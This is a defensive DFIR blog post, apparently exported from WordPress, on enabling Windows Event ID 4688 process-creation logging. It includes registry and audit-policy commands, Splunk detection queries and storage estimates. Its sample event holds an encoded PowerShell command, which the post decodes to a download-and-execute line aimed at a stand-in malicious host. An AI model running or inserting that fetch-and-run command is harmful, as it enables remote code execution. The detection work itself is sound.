Event ID 4688 \u2014 A new process has been created \u2014 is one of the highest-value events in Windows security logging when properly configured. Without command line logging enabled, it records only that a process spawned. With it enabled, it records
\nthe full command line including all arguments. The difference between these two states is enormous for investigation purposes.<\/p>\n
Step 1: Enable Audit Process Creation via Group Policy or local policy:<\/p>\n
Computer Configuration\n Windows Settings\n Security Settings\n Advanced Audit Policy Configuration\n Detailed Tracking\n Audit Process Creation: Success<\/pre>\nStep 2: Enable command line logging via registry:<\/p>\n
reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\" \\\n \/v ProcessCreationIncludeCmdLine_Enabled \/t REG_DWORD \/d 1 \/f<\/pre>\nVerify both are active:<\/p>\n
auditpol \/get \/subcategory:\"Process Creation\"\n# Process Creation Success\n\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\" \\\n \/v ProcessCreationIncludeCmdLine_Enabled\n# ProcessCreationIncludeCmdLine_Enabled REG_DWORD 0x1<\/pre>\nWhat a 4688 event looks like with command line logging enabled<\/h3>\n
Log Name: Security\nEvent ID: 4688\nTask: Process Creation\n\nNew Process Information:\n New Process ID: 0x1a4c\n New Process Name: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n Token Elevation Type: TokenElevationTypeFull (2)\n Mandatory Label: High Mandatory Level\n Creator Process Name: C:\\Windows\\System32\\cmd.exe\n Creator Process ID: 0x0f20\n\nProcess Command Line:\n powershell.exe -NonInteractive -NoProfile -EncodedCommand\n SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBtAGEAbABpAGMAaQBvAHUAcwAuAGUAeABhAG0AcABsAGUALwBwAGEAeQBsAG8AYQBkACcAKQA=<\/pre>\nDecoding the base64:<\/p>\n
echo \"SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBtAGEAbABpAGMAaQBvAHUAcwAuAGUAeABhAG0AcABsAGUALwBwAGEAeQBsAG8AYQBkACcAKQA=\" \\\n | base64 -d | iconv -f utf-16le -t utf-8\n# IEX (New-Object Net.WebClient).DownloadString('https:\/\/malicious.example\/payload')<\/pre>\nDetection patterns in Splunk<\/h3>\n
Suspicious encoded PowerShell:<\/p>\n
index=wineventlog EventCode=4688 \n (Process_Command_Line=\"*-EncodedCommand*\" OR Process_Command_Line=\"*-enc *\")\n| eval decoded=base64decode(replace(\n mvindex(split(Process_Command_Line, \" \"), -1),\n \" \", \"+\"))\n| table _time, host, New_Process_Name, Process_Command_Line, decoded<\/pre>\nNet commands used for domain reconnaissance:<\/p>\n
index=wineventlog EventCode=4688 New_Process_Name=\"*\\net.exe\" OR New_Process_Name=\"*\\net1.exe\"\n (Process_Command_Line=\"* user *\" OR Process_Command_Line=\"* group *\" \n OR Process_Command_Line=\"* localgroup *\")\n| stats count by host, Account_Name, Process_Command_Line\n| sort -count<\/pre>\nWMI spawning child processes (lateral movement indicator):<\/p>\n
index=wineventlog EventCode=4688\n Creator_Process_Name IN (\"*\\WmiPrvSE.exe\", \"*\\wmiprvse.exe\")\n NOT New_Process_Name IN (\"*\\WmiPrvSE.exe\", \"*\\conhost.exe\")\n| table _time, host, Creator_Process_Name, New_Process_Name, Process_Command_Line<\/pre>\nStorage volume estimate<\/h3>\n
On an average enterprise workstation generating approximately 200 process creation events per hour, Event ID 4688 with command line logging adds roughly 15-25MB of raw event log data per day per endpoint. At 1,000 endpoints this is 15-25GB\/day.
\nIn a SIEM with compression and indexing, budget approximately 5-8GB\/day at that scale. The cost is worth it \u2014 process creation logs are the single most consistently useful data source in incident investigations.<\/p>\n","protected":false},"excerpt":{"rendered":"If you are not logging process creation with command line
\narguments enabled, you are missing a significant chunk of attacker activity.<\/p>\n","protected":false},"author":0,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-190","post","type-post","status-publish","format-standard","hentry","category-dfir"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/190","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=190"}],"version-history":[{"count":2,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/190\/revisions"}],"predecessor-version":[{"id":232,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/190\/revisions\/232"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/media?parent=190"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/categories?post=190"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}